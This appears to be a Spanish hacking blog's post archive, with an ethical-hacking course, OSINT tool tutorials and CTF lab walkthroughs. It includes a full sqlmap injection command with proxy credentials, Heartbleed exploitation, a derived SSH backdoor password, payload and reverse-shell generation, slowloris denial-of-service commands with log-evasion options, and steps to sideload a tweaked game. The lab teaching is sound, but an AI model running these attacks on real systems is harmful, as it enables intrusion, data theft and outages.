Mostrando entradas con la etiqueta Rabbit Hutch. Mostrar todas las entradas
Mostrando entradas con la etiqueta Rabbit Hutch. Mostrar todas las entradas

miércoles, 28 de septiembre de 2016

FOCA, CREEPY... Y mucha información a la vista de muy pocos (Parte II)

Buenas chavales!!

Ya hacía tiempo que no subía vídeo... Se nota que ya estamos metidos en Septiembre, y cada vez hay más tareas que realizar :-P.

Hoy vamos a terminar de hablar de la herramienta Foca, con la que vimos en el vídeo anterior, como sacar metadatos desde una página web, en ésta ocasión va a ser de una fotografía que yo mismo realicé con mi teléfono móvil. La cantidad de información que contiene, veréis que es exagerada. Hay webs, donde podéis eliminar toda esa información para subirla a vuestros servidores, o directamente tenerlo guardado sin dar tanta pista. Total... Vosotros ya sabéis dónde se tomó la foto. No voy hacer más incapié en la herramienta Foca, para que vosotros mismos podáis familiarizaros con ella, y sacarle el partido que se le puede sacar.

Otra herramienta de OSINT que podemos encontrar es: Creepy, ya hay una entrada en éste mismo blog, muy bien explicado, y con otro ejemplo que es digno de ver :-D.

Tambien hay otra pequeña sección, de la recolección de información, con un ADD-ON, para Mozilla Firefox, con la que podemos extraer mucha información de una página web, toda información es valiosa, y más si luego queremos hacer un poco de Ingenieria Social, que nuestro compañero Naivenom, algún día nos enseñará :-O.

Y por último... Y para que investiguéis vosotros... Shodan.

Shodan: Es un motor de búsqueda que le permite al usuario encontrar iguales o diferentes tipos específicos de equipos (routers, servidores, etc.) conectados a Internet a través de una variedad de filtros. Algunos también lo han descrito como un motor de búsqueda de banners de servicios, que son metadatos que el servidor envía de vuelta al cliente. Esta información puede ser sobre el software de servidor, qué opciones admite el servicio, un mensaje de bienvenida o cualquier otra cosa que el cliente pueda saber antes de interactuar con el servidor.

Shodan recoge datos sobre todo en los servidores web al momento HTTP puerto 80), pero también hay algunos datos de FTP (21), SSH (22) Telnet (23), SNMP (161) y SIP (5060).



















Un saludo!

Rubén Gutiérrez
@rgutga

viernes, 9 de septiembre de 2016

Sacando a pasear a la FOCA (Parte I)

Buenas chavales!!

En ésta nueva entrada voy a poner los pasos sencillos que veremos en el vídeo de lo que hemos hecho con ésta herramienta. 


FOCA (Fingerprinting Organizations with Collected Archives) es una herramienta utilizada principalmente para encontrar metadatos e información oculta en los documentos que examina. Estos documentos pueden estar en páginas web, y con FOCA se pueden descargar y analizar.
Los documentos que es capaz de analizar son muy variados, siendo los más comunes los archivos de Microsoft Office, Open Office, o ficheros PDF, aunque también analiza ficheros de Adobe InDesign, o svg por ejemplo.
Estos documentos se buscan utilizando tres posibles buscadores que son Google, Bing y Exalead. La suma de los tres buscadores hace que se consigan un gran número de documentos. También existe la posibilidad de añadir ficheros locales para extraer la información EXIF de archivos gráficos, y antes incluso de descargar el fichero se ha realizado un análisis completo de la información descubierta a través de la URL.
Con todos los datos extraídos de todos los ficheros, FOCA va a unir la información, tratando de reconocer qué documentos han sido creados desde el mismo equipo, y qué servidores y clientes se pueden inferir de ellos.
Como se podrá ver en el vídeo, no hemos sacado el jugo que se le puede sacar, que no es poco, pero podemos hacernos una idea, para tener clara la recolección de datos que es el tema de estas semanas.

Como veremos en el vídeo, lo que hemos hecho ha sido crear un proyecto, con la página web de ejemplo que he creado, (www.cursohackingeticorabbithutch.tk). Y nos ha descubierto que tenemos 2 archivos, los cuales los hemos descargado y visto sus metadatos. Así de fácil y sencillo. Una herramienta que nos permite automatizar muchos pasos a un sólo click.

En el vídeo se muestra también la instalación de Windows 10, que podemos descargar su imagen desde la página web https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 

Y por supuesto... Para los que digan, que sólo quieren LINUX... Conseguí instalar Foca en KALI LINUX 2016.2. Os dejo el enlace para que lo intentéis vosotros.

http://www.elladodelmal.com/2010/09/la-foca-en-linux.html

Si os gusta el programa, hay un libro que os recomiendo de la editorial 0xWord, se llama Pentesting con Foca, evidentemente, está escrito por Chema Alonso, responsable del programa Foca.














Saludos!

Rubén Gutiérrez
@rgutga

miércoles, 7 de septiembre de 2016

Curso Hacking Ético: Principios básicos arquitectura de redes Parte I

Buenas chavales!!

Hoy os traigo un vídeo donde rápidamente vamos a pasar a ver los modelos OSI y TCP/IP, de una forma clara y concisa.

Van a ser unas semanas de teoría, pero totalmente necesarias para poder coger una base solida para lo que nos viene encima :-).

Explicaremos las 7 capas compuestas por el modelo OSI, y su similitud comparado con el modelo TCP/IP.

En el siguiente vídeo, indagaremos más sobre cada capa, y su función, así que si hoy no habéis entendido algo, podéis preguntar, y aparte la semana siguiente habrá otro vídeo explicándolo un poco más claro.


Aquí os dejo el vídeo de hoy:






Un saludo!!


Rubén Gutiérrez.

domingo, 4 de septiembre de 2016

Pentestit.ru - Test lab v.9 (Parte I)

Buenas hackers! Bienvenidos al lab.pentestit.ru

Me ha costado hacerlo en una semana más o menos y es el tiempo que me puse para hacerlo. No lo he terminado debido a su dificultad, y aún con ayuda me quede de momento en el 63%. Tengo que dar agradecimientos al compañero belane que me resolvió un token, ya que andaba bastante perdido y también a una persona del canal de telegram en inglés del lab, que me ha ayudado en el transurso de él. Gracias.

Una vez dicho esto, hay que conectarse mediante VPN al servidor. Para ello podemos hacerlo de dos formas, bajarnos la iso que tienen disponible para hacer el lab o bajarse el archivo de configuracion de la VPN y usar openvpn con dicho archivo. Usare esta ultima para poder usar parrotOS.
Por tanto solo basta con descargarnos ese arhivo e irnos luego a network connections y añadir una nueva conexion VPN, importando una configuracion VPN previamente guardada. Una vez elegido esto simplemente hay que poner el user y la pass que nos proporciona la web.
Es muy aconsejable que miremos el esquema de la red interna del lab, ya que es la estructura principal por donde nos moveremos en el pentesting. Vemos que hay dos subredes bien diferenciadas y distintos servidores con software y sistemas diferenciados, al giaul que los servicios que prestan.
De primeras solo podemos hacer un descubrimiento de red a la ip del gateway. Una vez conectado a la VPN necesitamos nmap para ver que puertos del gateway estan abiertos.

Atención Spoiler!!

Nmap para realizar un escaneo Con la opción -sV permite ver la versión de los servicios, con -A permite la deteción de OS, la versión, script scanning, y traceroute. Con -T4 indica el tiempo de envió de los paquetes, es decir desde 0-6, la más baja es la más lenta, y también mejor ya que podría evadir algunos firewall.
 Haciendo pruebas en el navegador, no resuelve el dominio por el protocolo http. Con https nos dice que es inseguro y en el puerto 8100 vemos que es un servidor de correo.
"El archivo hosts de un ordenador es usado por el sistema operativo para guardar la correspondencia entre dominios de Internet y direcciones IP. Este es uno de los diferentes métodos que usa el sistema operativo para resolver nombres de dominios."Wikipedia.
Así añadimos la dirección del gateway con su nombre del dominio y guardamos. Vemos dos email que pueden ser usados como nombres de usuario dentro de la red, así que es importante tenerlo en cuenta para mas adeltante.

Vemos su código fuente y no se ve nada de interés, unicamente contenido de wordpress. Si es un wordpress ¿Por qué no probamos el wp-login? Bien vemos que hay detras un WAF, detector de intrusos. Probamos dirb para hacer fuzzing de los directorios (Sin resultados positivos).
Sabiendo que es un wordpress, vamos a usar wpscan, para poder enumerar diferentes usuarios y las vulnerabilidades de los plugins.
 Probe buscar en searchsploit symposium para ver algún tipo de exploit para poder ganar algun tipo de acceso al servidor. En uno de ellos usaremos un SQLi en donde se aprecia una PoC, por tanto que mejor que usarla. Permite de una forma muy sencilla usando wget, obtener la base de datos incluyendo datos e informacion sensinble de usuarios y hashes de las contraseñas. Sin exito, error 403 Forbbiden. Creo que no se puede explotar ninguna vulnerabilidad por el puerto 80 debido al WAF. Así que probemos el puerto 443 https.

Segun Nmap esta abierto el puerto y la version de nginx esta obsoleta. Vamos a ver que tipo de SSL se esta usando con sslscan.
Esta herramienta permite realizar un escaneo para la busca de vulnerabilidad del SSL, y así poder subsanarla.
Según el resultado nos indica que es vulnerable a heartbleed. Podemos usar los scripts de Nmap para poder ver la vulnerabilidad del SSL tambien. Recomiendo usar la documentación en la web de Nmap en la seccion de NSE para ver todos los scripts disponibles que tenemos para poder hacer una buena auditoría de seguridad y pentesting.
Obtenemos un resultado positivo con un riesgo alto.
Vamos a usar metasploit, un auxiliar para poder explotar dicha vulnerabilidad en busca de información. La recoleccion de información es un proceso muy importante para poder encontrar información sensible como por ejemplo usuarios.
Seleccionamos la versión del TLS, rhost y en verbose para poder ver la salida de la ejecucción del auxiliar.
Encontramos un backup de usuarios....
Es una dirección web, como podemos observar en /var/html/_old.....
Lo introduccimos en el navegador y nos lo descargamos.
Bien tenemos unos usuarios con sus hashes.
Usaremos hashcat y el parametro -m
Y el resultado es la obtención del token bypass y conttraseñas utiles que nos van a servir para hacer lo que vendrá a continuación.

Una vez obtenido los usuarios del proxy, ya que vimos el resultado del nmap con un puerto abierto y su servicio proxy, vamos a usar sqlmap para explotar la vulnerabilidad anterior con el proxy y con las credenciales de un usuario.
Usamos esta parte del exploit que encontramos:
/wp-content/plugins/wp-symposium/get_album_item.php?size=
Como hay un WAF y en los intentos no nos ha dado resultado, ponemos el como proxy la url de la web:
--proxy="http://192.168.101.8:3128"

 y usamos una de las credenciales antes obtenidas
--proxy-cred="b.muncy:rabbit"

que nos dé un user-agent aleatorio:
--random-agent

le indica número de intentos o de carga:
--level="4"

sqlmap -u "http://cybear32c.lab/wp-content/plugins/wp-symposium/get_album_item.php?size=1" --dbs --proxy="http://192.168.101.8:3128" --proxy-cred="b.muncy:rabbit" --random-agent --level="4" 

Despues de un tiempo, nos devuelve dos bases de datos, concretamente MySQL.
Ahora usamos una base de datos, y obtenemos las tablas de ella
Seguidamente las columnas, y luego un dump.
Y bien, de esta forma obtenemos el token.

Una vez analizado el puerto 80 y 443, y mediante el uso del proxy pudimos obtener el token, nos conectaremos mediante el puerto 22 el servicio SSH al servidor. Es muy importante intentar conseguir acceso mediante este servicio ya que una vez conseguido podemos hacer pivoting dentro de la red interna, y a su vez crear un tunel hacia nuestro localhost y auditar o realizar un test de intrusión en dicho server interno. Por lo visto la versión del openssh no es vulnerable así que vamos a realizar la conexion para a ver si podemos obtener iunformacion del banner al conectarnos. Hice una consulta en el canal de telegram ya que no sabía por donde tirar y me dijeron que me fijase justamente en el banner. Podríamos buscar en google el nombre y saber que es. Aun así probamos contraseñas por defecto y nada. Por lo visto en github tiene un codigo en C, y podemos ver justamente el string The password en él y bueno no se programar en C, pero interpretando el código vemos lo siguiente:

En el código de la aplicación estaba la clave para pasar.
En la primera parte veíamos esto:

// disallow root logins
 if (strcmp(pUsername, "root") == 0) {
  return PAM_AUTH_ERR;
 }

Tiene deshabilitado el login de usuario " root "
En la segunda parte del código:

time_t now = time(NULL);
 struct tm *now_tm = localtime(&now);
 int hour = now_tm->tm_hour;
 int day = now_tm->tm_mday;

 char correctPass[11];
 sprintf(correctPass, "daypass%d%d", day, hour);

Nos dice time_t now = time(NULL) ----> hora actual
struct tm *now_tm = localtime(&now); ---> hora del lugar,(sabemos que el CTF está en Rusia, por lo tanto horario Ruso)
Aquí la manera de proceder con la clave:
sprintf(correctPass, "daypass%d%d", day, hour); ---->para que la pass sea correcta tenemos que poner daypass+el-día+la-hora (de Rusia)
Ejemplo:
Si en rusia son las 21:30, y hoy es el 7 de Agosto del 2016, la password sería ----> daypass721

Una vez deducida la password, usaremos usuarios comunes de linux, tal como daemon o www-data para el login en SSH.
Vemos que hay 3 users, probamos con el primero para loguearnos con él:
daemon@tl9-ssh:/etc$ su d.nash
The password: daypass723
d.nash@tl9-ssh:/etc$ cd /home
d.nash@tl9-ssh:/home$ ls -la
total 20
drwxr-xr-x 5 root root 4096 May 17 14:32 .
drwxr-xr-x 23 root root 4096 Aug 18 2013 ..
drwxr-x--- 3 root d.nash 4096 May 19 17:07 d.nash
drwxr-x--- 2 root e.grant 4096 May 17 14:54 e.grant
drwxr-x--- 2 root t.alvarez 4096 May 17 14:30 t.alvarez

Accedemos al directorio de d.nash :
d.nash@tl9-ssh:/home$ cd d.nash
d.nash@tl9-ssh:~$ ls -la
total 24
drwxr-x--- 3 root d.nash 4096 May 19 17:07 .
drwxr-xr-x 5 root root 4096 May 17 14:32 ..
-rw-r----- 1 root d.nash 220 Dec 30 2012 .bash_logout
-rw-r----- 1 root d.nash 3392 Dec 30 2012 .bashrc
-rw-r----- 1 root d.nash 675 Dec 30 2012 .profile
drwxr-x--- 2 root d.nash 4096 May 19 17:11 .ssh ------> directorio oculto

Accedemos al directorio oculto .ssh
d.nash@tl9-ssh:~$ cd .ssh
d.nash@tl9-ssh:~/.ssh$ ls -la
total 24
drwxr-x--- 2 root d.nash 4096 May 19 17:11 .
drwxr-x--- 3 root d.nash 4096 May 19 17:07 ..
-rw-r----- 1 root d.nash 1675 May 19 16:52 id_rsa
-rw-r----- 1 root d.nash 396 May 19 16:52 id_rsa.pub
-rw-r----- 1 root d.nash 222 May 19 17:11 known_hosts
-rw-r----- 1 root d.nash 10 May 19 16:57 token.txt ----> flag

Ahora vemos con cat que hay dentro del token.txt:
d.nash@tl9-ssh:~/.ssh$ cat token.txt
******ah

Un saludo, Naivenom

martes, 30 de agosto de 2016

La fraude fiscale des grandes sociétés

Buenas hackers! Y bienvenidos a otro CTF de Vulnhub

"Welcome to Droopy. This is a beginner's boot2root/CTF VM.
The VM is set to grab a DHCP lease on boot.
There's 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It's fun to read other people's email.
SHA1SUM: e6862fa5ebc9c2a8e582e77f440510062afe47ba droopyctf.ova
Special thanks and shout-outs go to Barrebas and Rasta_Mouse for testing, and g0tmi1k for advice and offering to host my first CTF."

Atención Spoiler!!

En este CTF veremos el uso de exploits locales gracias a searchsploit, las diferentes técnicas entre el uso de un script en Python, una shell escrita en PHP y nc, o el uso más automatizado de Metasploit.
La escalada de privilegios basada en el uso de un exploit local debido a la versión del Kernel. Recomiendo mucho esta página web para poder realizar escalada de privilegios en Linux básicos---> https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Una vez obtenido un fichero en .tc nos indica que es TrueCrypt y que tendremos que obtener una password en texto plano para poder montar un volumen. El descifrado se usa Hashcat.


Un saludo, Naivenom

jueves, 4 de agosto de 2016

We have more power than they think (Mr.Robot)

Buenas hackers! En este CTF se realizará un test de intrusión a una maquina vulnerable de Vulhub
Seguramente muchos de vosotros hayáis visto esta serie, y ahora se esta lanzando los nuevos capítulos de la segunda temporada:


Os animo a resolver el CTF antes de ver el nuevo capitulo de hoy. No lea más esta entrada e inicie el reto de ser root y capturar la bandera final!
Cualquier duda siempre puede consultar el vídeo ;)

Atención Spoiler!!


En esta PoC, se verá procedimientos para realizar un test de intrusión tales como un escaneo y enumeración de los servicios con nmap. Interacciones con el servidor web con nikto, ataques de fuerza bruta y subida de un archivo malicioso creado con msfvenom en php para obtener una sesión meterpreter, conectándose el servidor web mediante una petición http que hacemos nosotros con curl a nuestra maquina atacante.
Una vez obtenida la shell, veremos que nmap tiene setuid y es una versión obsoleta. Por lo cual en el modo interactivo podremos escalar privilegios a root.
Os dejo con el CTF:

Un saludo, Naivenom. 


viernes, 29 de julio de 2016

Curso Hacking Ético: Comandos básicos Linux

Buenas chavales!!

En ésta nueva entrega del curso de hacking ético y pentesting, vamos a ver rápidamente algunos de los comandos más utilizados que realizaremos a lo largo del curso.

Iremos viendo muchos más comandos según vayan saliendo, pero los imprescindibles que hay que saberse están en el vídeo. Por supuesto, cuantos más nos sepamos mejor, y sobretodo saber manejarlos.

Os dejo un link, a una web con un montón de comandos, que podéis ir probando y viendo como funcionan, hay que romper mano con Kali Linux y los comandos, y no tenerles miedo, van a ser como nuestro pan de cada día en la hora de hacer pentesting.

Os dejo con el vídeo de YouTube.





Un saludo!
http://www.cursohackingeticorabbithutch.tk
Rubén Gutiérrez
@rgutga

jueves, 28 de julio de 2016

PoC: Hack Pokémon Go sin Jailbreak (Sólo iPhone)

Buenas chavales!

Hoy os presento un hack para Pokemon Go.

Es exclusivamente para Iphone y con ordenador con el sistema operativo OS X instalado, preferiblemente de origen (MAC, iMAC, MACBOOK…)

Antes de continuar, deberéis tener desinstalado Pokémon Go del dispositivo.

Para hacer el hackeo a la aplicación, necesitareos 4 programas.

1º Xcode (Se descarga de la AppStore, por ejemplo)
3º El juego hackeado. https://www.iphonecake.com/ -Buscar Pokémon Go, y la versión (Tweaked)
4º iOS signer, para firmar y validar la aplicación una vez parcheada. https://dantheman827.github.io/ios-app-signer/

Teniendo todo descargado y en el escritorio, entramos en materia.

Lo primero, abrir el Xcode, y seleccionamos Create a new Xcode Project.
Seleccionamos Master-Detail Application y le damos a next. En Product Name: ponemos el nombre que queramos, en nuestro caso, RabbitHutchPokemon, y en Organization Identifier: com.RabbitHutch (por ejemplo).
Seguimos con Next, y luego Create.
Ahora estaremos en la página de inicio de Xcode, con el programa por hacer. Hay una exclamación en amarillo, le damos a FIX ISSUE, y entonces, sino estamos registrados, nos pedirá un correo electrónico y contraseña para hacernos Developer, poner la del AppStore y os deberá de dejar entrar.
Luego iremos al menú de arriba a la izquierda, que pone Xcode, y seleccionamos Preferences… Luego nos vamos a la pestaña Account, de ahí nos iremos a View Details… Y dentro, nos tiene que salir en Provisioning Profiles, una direcciones que abriremos con el segundos botón, y daremos a Show in Finder (si no os sale nada en Provisioning Profile, algo está mal hecho, seguramente no le habréis dado a la exclamación)
Continuamos con la carpeta abierta, ya podemos cerrar la pestaña, y dejamos el programa Xcode minimizado.
Ahora le podemos cambiar el nombre al archivo que hemos descargado, para que sea más sencillo, y lo guardamos en la carpeta de PokemonGoanyWhere.
Abrimos el terminal y tecleamos cd y arrastramos la carpeta (los comandos los iremos viendo en el curso que estoy haciendo, así que si no los entendeís ahora no pasa nada, lo iremos viendo) y apretamos a enter.
Una vez dentro de la carpeta, tecleamos chmod +x optool patchapp.sh y otra vez enter.
Luego ./patchapp.sh patch RabbitHutchPokemon.ipa y arrastramos el archivo que tenemos abierto en la carpeta, y le damos a enter.
Ahora se estará desempaquetando el archivo, parcheando y volviendo a empaquetar.
Para terminal, abriremos el iOS app Signer, y damos a browser y seleccionamos el archivo, luego en Provisioning Profile: Seleccionaremos el que hemos creado, daremos a STAR y guardaremos en el escritorio.
Volvemos con el paso final. Abrimos Xcode, nos vamos a Windows-Devices y seleccionamos nuestro teléfono, damo al +, seleccionamos nuestro archivo parcheado y firmado, y ya sólo nos queda terminar con el teléfono.
Vamos a AJUSTES-GENERAL-GESTIÓN DE DISPOSITIVOS, seleccionamos la cuenta, y le damos a CONFIAR, volvemos a dar a CONFIAR, y ya tenemos todo para jugar.

Espero que os haya sido de ayuda, y os dejo el vídeo donde explico todo detallado.





Un saludo!


sábado, 23 de julio de 2016

Curso Hacking Ético: VirtualBox y Kali Linux

Buenas chavales!

Hoy os traigo un nuevo vídeo, esta vez ya entramos en materia, y empezamos a instalar nuestra máquina virtual (VirtualBox), para ir preparando nuestro taller.

También haremos una breve introducción de que es Kali Linux, y un pequeño tutorial de como se hace la instalación desde 0.

El curso se pone en marcha, y empezamos a ver un poco de práctica en escritorio... ¡Ésto se pone interesante!

No olvidéis suscribiros al canal para poder recibir los vídeos en vuestro correo una vez colgados en YouTube.


Os dejo unos links, para poder realizar las instalaciones tanto de la máquina virtual, como de la distribución que usaremos. Más adelante, instalaremos otro sistema operativo (ésta vez vulnerable), para hacer las PoC's (Proof Of Concept).

https://www.virtualbox.org/
https://www.kali.org/



También os pongo una página interesante, con más de 400 comandos, para podáis ir practicando. En el siguiente vídeo veremos algunos de esos comandos, sobre todo lo más usados, pero siempre está bien que sepamos los máximos posibles, o por lo menos saber de una guía para buscarlos en caso de necesitarlos.

http://blog.desdelinux.net/mas-de-400-comandos-para-gnulinux-que-deberias-conocer/


Eso es todo con este vídeo.

Os espero en el próximo, más y mejor :)





Rubén Gutiérrez.
@rgutga.
www.cursohackingeticorabbithutch.tk


miércoles, 20 de julio de 2016

Zero Cool, Margo, Eugene en Gibson:0.2

Buenas a todos!! En esta entrada se realiza un test de intrusión a una maquina virtual vulnerable, de la página de Vulnhub
Recomiendo que si tiene interés en hacer este CTF que nos proporciona Vulnhub, no lea más esta entrada e inicie el reto de ser root y capturar la bandera!
Cualquier duda siempre puede consultar el vídeo ;)


 Atención Spoiler!!


En el veremos una vulnerabilidad de ImageMagick para la escalada de privilegios CVE-2016-3714, fallos de seguridad en el código fuente de la página HTML descubriendo un usuario y su contraseña para posteriormente realizar una conexión ssh al servidor.
Se usará John the Ripper para descifrar en texto plano los hashes del archivo /etc/shadow.
Y el kit de herramientas Sleuth Kit, muy usado para el análisis forense en los sistemas.
Veremos también una herramienta llamada cupp.py para la realización de diccionarios personalizados orientados a un objetivo en concreto. Haciéndonos una serie de preguntas o afirmaciones ya sea la fecha de nacimiento, nombres, apellidos, nick etc...
Ese diccionario donde estará la supuesta clave privada para poder descifrar con gpg el archivo protegido flag.txt, que será la meta de este CTF.


Espero que os haya servido de ayuda si os habéis quedado atrancado en el CTF. Obviamente hay diferentes caminos para poder llegar al flag.txt. Esta es una de las soluciones que propongo :)
Nos veremos muy a menudo publicando vídeos ya sea en la categoría de Pentesting en sistemas vulnerables como en Hacking con PoC's.
Cualquier inquietud o duda personal, no dudéis en consultar en mi Twitter
Un saludo, Naivenom

lunes, 18 de julio de 2016

Curso Hacking Ético: Introducción

Buenas chavales!

Vamos a empezar un curso prácticamente desde 0, de Hacking Ético y Pentesting, con lo que nos podréis seguir sin necesidad de tener grandes conocimientos de informática, sólo os faltará tener, motivación y ganas de aprender las reglas de la seguridad informática.

En el vídeo de introducción, podremos ver un poco las definiciones de lo que realmente es un Hacker, que también nuestro compañero andatux nos dejó una entrada para poder leer, y es bien interesante sobre el tema. Hollywood-Hackers

Hay una pequeña sección sobre los hackers que me han inspirado para seguir éste camino, el cual no es fácil, pero con ganas y fuerza de voluntad, se aprende.

Y ya acabamos con una pequeña guía de lo que veremos en las siguientes semanas.

El próximo Viernes, habrá nuevo vídeo sobre la instalación de VirtualBox en nuestra máquina, (os adelanto que yo haré el vídeo de instalación en un entorno OS X, concretamente "El Capitán".

Para luego poder instalar nuestra distribución favorita en la rama del pentesting, que es Kali Linux.

Veremos los comandos más usuales que necesitaremos tener presente, y así romper mano con Linux.

Y más adelante, ya entraremos en materia con lo que viene siendo las redes, para entender la parte técnica de los test de penetración que haremos contra nuestras máquinas.

Espero que os guste mucho el curso, y os espero a todos!






Rubén Gutiérrez.
@rgutga.

www.cursohackingeticorabbithutch.tk

martes, 12 de julio de 2016

Setoolkit para la creación de payloads

Buenas noches hackers! En esta entrada con un vídeo explicativo de Rabbit Hutch, se procederá a la creación de payloads y el uso del exploit/multi/handler para estar a la escucha de por un puerto determinado a la espera de una conexión inversa a nuestro host, dentro de una red LAN proporcionada por VMware y en un entorno controlado virtualizado.


SET, proporciona un gran abanico de posibilidades en cuanto a ataques de ingeniería social. Estas herramientas se integran con el framework Metasploit para así garantizar una fase de explotación en el sistema víctima. 
La creación de un payload ejecutable garantiza que ese binario malicioso mediante la ingeniería social, la víctima pueda ejecutarlo y así realizar la conexión hacia nuestro host y la obtención de meterpreter para uso de administración remota del sistema. 
Este payload generado no es FUD, por tanto existen métodos de ofuscación de código ya sea una vez compilado, o desde su código fuente. Para ello esta entrada y este vídeo es un mera introducción a malware, detectado por los diferentes AV's existentes en el mercado. Dentro de poco veremos herramientas que generan troyanos o RAT, completamente FUD o casi. 
Pero básicamente el procedimiento es el mismo. La elección de un payload y su correspondiente exploit. Herramientas como Veil-Evasion permiten la creación de payloads y poder usarlo con el exploit/multi/handler de Metasploit a la espera de la conexión (o payload) inversa dada una dirección IP pública o privada y un puerto determinado. 
También veremos más adelante de forma teórica ataques fuera de la red LAN mediante el uso de NoIP y apertura de puertos en la puerta de enlace o gateway. 

Proof of concept

Un saludo Naivenom

lunes, 11 de julio de 2016

DoS con Slowloris.pl

Buenas hackers en esta PoC, os muestro esta genial herramienta que permite realizar un ataque de denegación de servicio a un servidor Linux. Esto genera que ese servicio sea inaccesible a los usuarios legítimos. En este caso mantiene conexiones abiertas el máximo tiempo posible a base del envío de peticiones http a una tasa de datos muy baja.. Para esta prueba de concepto se realizará en un entorno virtualizado controlado, usando una máquina atacante Kali Linux y un servidor Ubuntu como víctima.


Slowloris.pl esta escrita en perl y disponible en Github


Requirimientos y los pasos a seguir

 
How use Slowloris

Requirements:
# sudo apt-get update  
# sudo apt-get install perl
# sudo apt-get install libwww-mechanize-shell-perl
# sudo apt-get install perl-mechanize


1)Download slowloris.pl
2)Open Terminal
2)# cd /thePathToYourSlowloris.plFile
3)# ./slowloris.pl
4)# perl slowloris.pl -dns (Victim URL or IP) -options



Done


Laera Loris"

Documento de ayuda

 
TITLE
    Slowloris

VERSION
    Version 0.7 Beta

DATE
    06/17/2009

AUTHOR
    RSnake <h@ckers.org> with threading from John Kinsella

ABSTRACT
    Slowloris both helps identify the timeout windows of a HTTP server or
    Proxy server, can bypass httpready protection and ultimately performs a
    fairly low bandwidth denial of service. It has the added benefit of
    allowing the server to come back at any time (once the program is killed),
    and not spamming the logs excessively. It also keeps the load nice and low
    on the target server, so other vital processes don't die unexpectedly, or
    cause alarm to anyone who is logged into the server for other reasons.

AFFECTS
    Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?

NOT AFFECTED
    IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

DESCRIPTION
    Slowloris is designed so that a single machine (probably a Linux/UNIX
    machine since Windows appears to limit how many sockets you can have open
    at any given time) can easily tie up a typical web server or proxy server
    by locking up all of it's threads as they patiently wait for more data.
    Some servers may have a smaller tolerance for timeouts than others, but
    Slowloris can compensate for that by customizing the timeouts. There is an
    added function to help you get started with finding the right sized
    timeouts as well.

    As a side note, Slowloris does not consume a lot of resources so modern
    operating systems don't have a need to start shutting down sockets when
    they come under attack, which actually in turn makes Slowloris better than
    a typical flooder in certain circumstances. Think of Slowloris as the HTTP
    equivalent of a SYN flood.

  Testing
    If the timeouts are completely unknown, Slowloris comes with a mode to
    help you get started in your testing:

   Testing Example:
    ./slowloris.pl -dns www.example.com -port 80 -test

    This won't give you a perfect number, but it should give you a pretty good
    guess as to where to shoot for. If you really must know the exact number,
    you may want to mess with the @times array (although I wouldn't suggest
    that unless you know what you're doing).
 
 HTTP DoS
    Once you find a timeout window, you can tune Slowloris to use certain
    timeout windows. For instance, if you know that the server has a timeout
    of 3000 seconds, but the the connection is fairly latent you may want to
    make the timeout window 2000 seconds and increase the TCP timeout to 5
    seconds. The following example uses 500 sockets. Most average Apache
    servers, for instance, tend to fall down between 400-600 sockets with a
    default configuration. Some are less than 300. The smaller the timeout the
    faster you will consume all the available resources as other sockets that
    are in use become available - this would be solved by threading, but
    that's for a future revision. The closer you can get to the exact number
    of sockets, the better, because that will reduce the amount of tries (and
    associated bandwidth) that Slowloris will make to be successful. Slowloris
    has no way to identify if it's successful or not though.

   HTTP DoS Example:
    ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto
    5

  HTTPReady Bypass
    HTTPReady only follows certain rules so with a switch Slowloris can bypass
    HTTPReady by sending the attack as a POST verses a GET or HEAD request
    with the -httpready switch.

   HTTPReady Bypass Example
    ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto
    5 -httpready
 
  Stealth Host DoS
    If you know the server has multiple webservers running on it in virtual
    hosts, you can send the attack to a seperate virtual host using the -shost
    variable. This way the logs that are created will go to a different
    virtual host log file, but only if they are kept separately.

   Stealth Host DoS Example:
    ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1
    -shost www.virtualhost.com

  HTTPS DoS
    Slowloris does support SSL/TLS on an experimental basis with the -https
    switch. The usefulness of this particular option has not been thoroughly
    tested, and in fact has not proved to be particularly effective in the
    very few tests I performed during the early phases of development. Your
    mileage may vary.

   HTTPS DoS Example:
    ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

  HTTP Cache
    Slowloris does support cache avoidance on an experimental basis with the
    -cache switch. Some caching servers may look at the request path part of
    the header, but by sending different requests each time you can abuse more
    resources. The usefulness of this particular option has not been
    thoroughly tested. Your mileage may vary.

   HTTP Cache Example:
    ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache

Issues
    Slowloris is known to not work on several servers found in the NOT
    AFFECTED section above and through Netscalar devices, in it's current
    incarnation. They may be ways around this, but not in this version at this
    time. Most likely most anti-DDoS and load balancers won't be thwarted by
    Slowloris, unless Slowloris is extremely distrubted, although only
    Netscalar has been tested.

    Slowloris isn't completely quiet either, because it can't be. Firstly, it
    does send out quite a few packets (although far far less than a typical
    GET request flooder). So it's not invisible if the traffic to the site is
    typically fairly low. On higher traffic sites it will unlikely that it is
    noticed in the log files - although you may have trouble taking down a
    larger site with just one machine, depending on their architecture.

    For some reason Slowloris works way better if run from a *Nix box than
    from Windows. I would guess that it's probably to do with the fact that
    Windows limits the amount of open sockets you can have at once to a fairly
    small number. If you find that you can't open any more ports than ~130 or
    so on any server you test - you're probably running into this "feature" of
    modern operating systems. Either way, this program seems to work best if
    run from FreeBSD.

    Once you stop the DoS all the sockets will naturally close with a flurry
    of RST and FIN packets, at which time the web server or proxy server will
    write to it's logs with a lot of 400 (Bad Request) errors. So while the
    sockets remain open, you won't be in the logs, but once the sockets close
    you'll have quite a few entries all lined up next to one another. You will
    probably be easy to find if anyone is looking at their logs at that point
    - although the DoS will be over by that point too.

What is a slow loris?
    What exactly is a slow loris? It's an extremely cute but endangered mammal
    that happens to also be poisonous. Check this out:

    http://www.youtube.com/watch?v=rLdQ3UhLoD4
 

Proof of concept 


Un saludo Naivenom

jueves, 7 de julio de 2016

Setoolkit + BeEF

Buenas hackers! En esta PoC os traigo como clonar un sitio web mediante la ingeniería social en un entorno controlado, es decir, virtualizado dentro de la misma red virtual que nos proporciona VMware. La prueba de concepto la podeís encontrar grabada y editada en el canal de Youtube del blog, Rabbit Hutch


